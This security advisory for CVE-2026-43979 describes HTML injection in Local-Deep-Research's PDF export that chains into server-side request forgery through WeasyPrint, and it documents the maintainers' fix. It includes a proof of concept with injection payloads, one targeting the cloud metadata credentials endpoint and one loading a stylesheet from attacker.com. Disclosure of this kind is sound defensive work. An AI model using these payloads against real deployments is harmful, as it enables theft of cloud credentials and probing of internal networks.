PT-2026-39893 · Pypi · Local-Deep-Research

Published

2026-05-11

·

Updated

2026-05-11

·

CVE-2026-43979

CVSS v3.1

5.0

Medium

VectorAV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary

PDFService. markdown to html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf validator.py.

Details

Vulnerable code: src/local deep research/web/services/pdf service.py, lines 171–176
# pdf service.py:171-176
if title:
  html parts.append(f"<title>{title}</title>")  # ← title is not escaped

if metadata:
  for key, value in metadata.items():
    html parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped
Data flow trace:
User input: research.query
    │
    ▼
research routes.py:1321
 pdf title = research.title or research.query
    │
    ▼
research routes.py:1325-1326
 export report to memory(report content, format, title=pdf title)
    │
    ▼
pdf service.py:107
 PDFService.markdown to pdf(markdown content, title=pdf title)
    │
    ▼
pdf service.py:137
  markdown to html(markdown content, title, metadata)
    │
    ▼
pdf service.py:172
 f"<title>{title}</title>"  ← injection point, no escaping
    │
    ▼
pdf service.py:112
 HTML(string=html content)  ← WeasyPrint renders the injected HTML
research.query is a string submitted by the user via POST /api/start research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.
Injection point 1: <title> tag breakout
Input:  </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>
When WeasyPrint encounters the injected <img> tag, it issues an HTTP GET request to the value of src by default.
Injection point 2: <meta> attribute breakout
Input:  " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">
WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.

Proof of Concept

Step 1: Log in and submit a research query containing the injection payload
POST /api/start research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid session>

{
 "query": "</title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/>",
 "mode": "quick",
 "model provider": "OLLAMA",
 "model": "llama3"
}
The response returns a research id, e.g. "aaaa-bbbb-cccc-dddd".
Step 2: After the research completes, trigger PDF export
POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid session>
X-CSRFToken: <csrf token>
Step 3: Intermediate HTML constructed server-side
<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>
Step 4: WeasyPrint issues an outbound HTTP request to the injected URL
Observed in network monitoring (e.g. tcpdump) or the target internal service logs:
GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...
Lightweight verification (no SSRF environment required):
Set the query to:
</title><title>INJECTED
The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.

Impact

1. Chained SSRF (High Severity)

By injecting <img src>, <link href>, or <style>@import url() tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:
  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.
This is an effective bypass of the application's existing SSRF defenses in ssrf validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.
  • Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside markdown to html:
import html

if title:
  html parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
  for key, value in metadata.items():
    html parts.append(
      f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
    )
Additionally, consider configuring WeasyPrint with a custom url fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:
def safe url fetcher(url, timeout=10):
  from ssrf validator import validate url
  if not validate url(url):
    raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
  return weasyprint.default url fetcher(url, timeout=timeout)

html doc = HTML(string=html content, url fetcher=safe url fetcher)

Report generated against commit f3540fb3 — local-deep-research, branch main.

Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:
#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks:
  • html.escape() now wraps the title value in <title>…</title>
  • Same for metadata keys/values in <meta name="…" content="…">
  • Regression tests added in tests/web/services/test pdf service.py
#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url fetcher recommendation from the Remediation section:
  • New safe url fetcher in pdf service.py delegates to weasyprint.default url fetcher only after security.ssrf validator.validate url accepts the URL
  • Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
  • Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown
  • Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
  • 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body
Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.

Fix

SSRF

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-43979
GHSA-FJ2M-QVH9-JQ4Q

Affected Products

Local-Deep-Research